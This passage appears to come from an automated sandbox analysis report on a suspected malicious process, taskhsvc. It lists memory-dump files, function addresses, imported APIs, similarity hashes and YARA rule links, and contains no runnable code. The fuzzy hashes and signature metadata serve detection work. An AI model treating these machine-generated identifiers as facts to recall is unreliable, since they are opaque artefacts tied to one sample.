Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortlocaltimememcpy
String ID: $
API String ID: 1567290103-3993045852
Opcode ID: 368bc4e7dc39388a4f6bce47fb7c4ccdc22479415c2cef219745158ffddf2f7b
Instruction ID: 64cc5f2d1b4bed12e9f641702ee12c35ba86208b1869713292d4ca3dacd2bb52
Opcode Fuzzy Hash: 368bc4e7dc39388a4f6bce47fb7c4ccdc22479415c2cef219745158ffddf2f7b
Instruction Fuzzy Hash: B21194B490435ADFCB00EFA9C58569EBBF0BF48314F008819E498A7355D7789545DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00EF107E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EF10D1
malloc.MSVCRT ref: 00EF10E9
exit.MSVCRT ref: 00EF112A
__stack_chk_fail.LIBSSP-0 ref: 00EF113D

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

@, xrefs: 00EF110F

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortexitmalloc
String ID: @
API String ID: 797983458-2766056989
Opcode ID: c10e39308f24426e721d7d96ce88f9932dd4c7cc9dfea272389454cbf2e1bb1c
Instruction ID: 4fb6fc10438c0b1441ff946f3576290130bc9e1f62e6d59db860f8ce6a1ee52c
Opcode Fuzzy Hash: c10e39308f24426e721d7d96ce88f9932dd4c7cc9dfea272389454cbf2e1bb1c
Instruction Fuzzy Hash: A811F8B090430ADFDB04EFA6C54576EBBF4BF40358F00885CE594AB241DB789585DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00EF13EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EF143E
_strdup.MSVCRT ref: 00EF1449
exit.MSVCRT ref: 00EF148A
__stack_chk_fail.LIBSSP-0 ref: 00EF149D

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

@, xrefs: 00EF146F

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$_strdupabortexit
String ID: @
API String ID: 2722030861-2766056989
Opcode ID: 6691e685900c9d10d1679536b37108ec24d1794e0a860ea5b416c6b70982e47e
Instruction ID: 2f1d3c16b9cc395d6b4eb04938802557b9a8f3163ae2aeb0e6997d5ca13af45d
Opcode Fuzzy Hash: 6691e685900c9d10d1679536b37108ec24d1794e0a860ea5b416c6b70982e47e
Instruction Fuzzy Hash: 7A1118B491830A9FCB04EF65C54566EBBF4AF80398F01881CA594AB241D7789545DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00FBC5D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

evutil_secure_rng_init.LIBEVENT-2-0-5 ref: 00FBC5F5
evutil_secure_rng_add_bytes.LIBEVENT-2-0-5 ref: 00FBC62F
evutil_secure_rng_get_bytes.LIBEVENT-2-0-5 ref: 00FBC645
__stack_chk_fail.LIBSSP-0 ref: 00FBC65B

Strings

, xrefs: 00FBC61E

Memory Dump Source

Source File: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failevutil_secure_rng_add_bytesevutil_secure_rng_get_bytesevutil_secure_rng_init
String ID:
API String ID: 992357759-3916222277
Opcode ID: 1917f29b6f4bbe4fb8690e17f95a4809b082db8c8122a53ea0ede944a66348c7
Instruction ID: b507a396571f707bbddbf49b8f5a4d0f1d962a0f93bd0da79021967ed211d502
Opcode Fuzzy Hash: 1917f29b6f4bbe4fb8690e17f95a4809b082db8c8122a53ea0ede944a66348c7
Instruction Fuzzy Hash: 19016D709047098BCB10EF64C946BCDF7F4EF09304F408A9C9498A7281D7B8AA859F92

Uniqueness

Uniqueness Score: -1.00%

Function 00DBE76C Relevance: 7.8, APIs: 5, Instructions: 329stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE9B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EE45AC), ref: 00EE9B69

strcmp.MSVCRT ref: 00DBE905
abort.MSVCRT ref: 00DBEA71
free.MSVCRT ref: 00DBEB46
free.MSVCRT ref: 00DBEB67
__stack_chk_fail.LIBSSP-0 ref: 00DBEBD6

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
